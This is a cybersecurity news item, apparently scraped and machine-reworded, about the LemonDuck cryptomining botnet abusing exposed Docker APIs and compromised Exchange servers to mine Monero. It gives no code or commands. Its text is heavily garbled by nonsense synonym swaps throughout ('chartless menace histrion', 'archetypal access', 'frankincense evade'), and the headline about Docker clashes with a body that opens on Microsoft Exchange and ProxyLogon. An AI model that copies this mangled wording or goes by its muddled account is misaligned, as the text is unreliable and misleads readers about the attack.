Nasty new botnet exploits Docker containers to mine cryptocurrency

Nasty new botnet exploits Docker containers to mine cryptocurrency

Trending 7 months ago 62
  1. Home
  2. News
  3. Computing
(Image credit: Future)

A caller botnet comprised of compromised Microsoft Exchange servers is mining cryptocurrency for its operators, reports suggest. 

According to researchers from information steadfast CrowdStrike, an chartless menace histrion is utilizing the LemonDuck cryptomining botnet to people servers via ProxyLogon. 

By looking for exposed Docker APIs for archetypal access, the attackers are past capable to tally a malicious instrumentality by utilizing a customized Docker ENTRYPOINT to download a “core.png” representation file, which disguises a Bash script.

Mining Monero

After gaining archetypal access, the attackers are capable to execute a fig of actions: maltreatment EternalBlue, BlueKeep oregon akin exploits to escalate privileges, instal cryptominers, and determination laterally crossed the compromised networks.

They tin besides instal files that let them to debar detection from immoderate antivirus oregon malware scanning bundle installed connected the compromised endpoints.

Of each the antithetic cryptominers, the attackers are predominantly utilizing XMRig to excavation Monero, privacy-oriented cryptocurrency which is said to beryllium much hard to trace. 

The researchers further explained that LemonDuck comes with a record called “a.asp”, which has the quality to disable the aliyun work connected Alibaba’s Cloud, and frankincense evade detection.

On wherefore the run was not detected sooner, the researchers noted the menace actors weren’t wide scanning nationalist IP ranges for exploitable onslaught surfaces, but alternatively moving laterally done LemonDuck, looking for SSH keys connected filesystem. Once they find SSH keys, they usage them to log into the servers, and tally each of the aforementioned malicious scripts. 

Cryptominers person go highly fashionable successful these past fewer years, with the rising terms of cryptocurrencies and easiness with which they tin beryllium sold connected the marketplace attracting attraction from honorable and dishonest actors alike.

Sead Fadilpašić

Sead is simply a seasoned freelance writer based successful Sarajevo, Bosnia and Herzegovina. He writes astir IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, information breaches, laws and regulations). In his career, spanning much than a decade, he’s written for galore media outlets, including Al Jazeera Balkans. He’s besides held respective modules connected contented penning for Represent Communications.

style="display:block" data-ad-client="ca-pub-6050020371266145" data-ad-slot="7414032534" data-ad-format="auto" data-full-width-responsive="true">